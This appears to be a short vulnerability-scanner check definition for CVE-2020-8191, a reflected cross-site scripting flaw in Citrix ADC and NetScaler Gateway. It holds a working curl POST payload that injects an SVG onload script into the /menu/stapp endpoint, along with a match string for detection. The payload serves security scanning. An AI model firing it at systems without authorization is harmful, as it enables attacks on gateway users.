AUTHOR='@xer0dayz'
VULN_NAME='CVE-2020-8191 - Citrix ADC & NetScaler Gateway Reflected XSS'
URI="/menu/stapp"
METHOD='POST'
MATCH="<svg/onload=alert\(1337\)>"
SEVERITY='P1 - HIGH'
CURL_OPTS="--user-agent '' -s -L --insecure -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: 'X-NITRO-USER: xpyZxwy6' --data 'sid=254&pe=1,2,3,4,5&appname=%0a</title><svg/onload=alert(1337)>&au=1&username=nsroot'"
SECONDARY_COMMANDS=''
GREP_OPTIONS='-i'